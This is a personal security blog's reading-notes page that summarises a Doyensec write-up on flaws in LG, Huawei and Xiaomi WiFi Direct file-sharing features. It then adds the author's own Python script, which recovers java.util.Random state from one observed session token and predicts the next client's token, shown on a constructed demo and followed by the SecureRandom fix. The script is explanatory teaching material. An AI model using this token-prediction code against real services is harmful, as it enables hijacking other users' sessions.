Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Abuses on W- 330

Lorenzo Stella - Doyensec. Posted 5 years ago.
  • Apparently WiFi Direct is a specification for P2P transfer over WiFi. Who knew!? The vendor sharing features built on top of it had several severe issues.
  • LG SmartShare Beam had an authorization issue: no session ID was required to transfer from one device to another, so you could force-send files with arbitrary names to users' devices.
  • Huawei Share was trivial to crash. Because of this, an application running on the device could deliberately crash the file transfer server and then bind its own listener to the service's port; at that point it can serve its own files through the API. Interesting attack scenario!
  • Xiaomi Mi Share was the most secure of the bunch. Still, there was a DoS by sending an enormous file, and session tokens were 19 digits long and generated with java.util.Random, which is predictable rather than cryptographically secure.
  • Overall, the read is enjoyable. I appreciated how crashing the service actually turned into an exploitable vulnerability that was NOT just a DoS.
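A worked example I've added here of why a java.util.Random session token is a problem. This is not code from the Doyensec post or from Mi Share; it assumes the token is the decimal form of a single nextLong() call (a 19-digit value is consistent with that), and the seed and the "server" below are constructed for the demo. The point is that java.util.Random is a 48-bit linear congruential generator and nextLong() leaks the top 32 bits of two consecutive states, so one token you were legitimately given leaves only 16 unknown bits of state, which is an instant brute force, after which the next client's token is known.

```python
"""Predicting java.util.Random session tokens from a single observed token.

Added example, not from the original post. Assumes the token is one
nextLong() value rendered in decimal. If the app strips the sign, run
predict_next_tokens() on both `observed` and `-observed`.
"""

MULT = 0x5DEECE66D          # LCG multiplier used by java.util.Random
ADD = 0xB                   # LCG increment
MASK48 = (1 << 48) - 1
MASK32 = (1 << 32) - 1
MASK64 = (1 << 64) - 1


def _signed(x, bits):
    """Reinterpret the low `bits` of x as a two's-complement signed value."""
    x &= (1 << bits) - 1
    return x - (1 << bits) if x >> (bits - 1) else x


class JavaRandom:
    """Bit-exact re-implementation of java.util.Random's seeded constructor."""

    def __init__(self, seed):
        self.seed = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state):
        """Build a generator directly from a raw 48-bit internal state."""
        r = cls.__new__(cls)
        r.seed = state & MASK48
        return r

    def _next(self, bits):
        self.seed = (self.seed * MULT + ADD) & MASK48
        return _signed(self.seed >> (48 - bits), 32)

    def next_int(self):
        return self._next(32)

    def next_long(self):
        # Java: ((long) next(32) << 32) + next(32), with 64-bit wraparound
        hi = self._next(32)
        lo = self._next(32)
        return _signed((hi << 32) + lo, 64)


def recover_generators(token):
    """Return every JavaRandom state consistent with `token` being the most
    recent nextLong() output. Almost always exactly one candidate."""
    v = token & MASK64
    lo_u = v & MASK32                      # top 32 bits of the 2nd LCG state
    hi_u = (v >> 32) & MASK32
    if lo_u >> 31:                         # lo was negative in Java, so the
        hi_u = (hi_u + 1) & MASK32         # addition borrowed from hi: undo it
    found = []
    for low16 in range(1 << 16):           # the only unknown bits of state 1
        s1 = (hi_u << 16) | low16
        s2 = (s1 * MULT + ADD) & MASK48
        if s2 >> 16 == lo_u:
            found.append(JavaRandom.from_state(s2))
    return found


def predict_next_tokens(token):
    """Candidate values for the token the server will hand out next."""
    return [g.next_long() for g in recover_generators(token)]


def demo(seed=42):
    """Constructed scenario: the server seeds Random once, gives us one
    session token, and we predict the token issued to the next client."""
    server = JavaRandom(seed)
    ours = server.next_long()          # the session ID we were legitimately given
    victims = server.next_long()       # the next client's session ID
    return ours, victims, predict_next_tokens(ours)


if __name__ == "__main__":
    ours, victims, predicted = demo()
    print("our token:       ", ours)
    print("next client's:   ", victims)
    print("predicted:       ", predicted)
```

The fix on the server side is java.security.SecureRandom (or any OS CSPRNG), with token length measured in bits of entropy rather than in decimal digits.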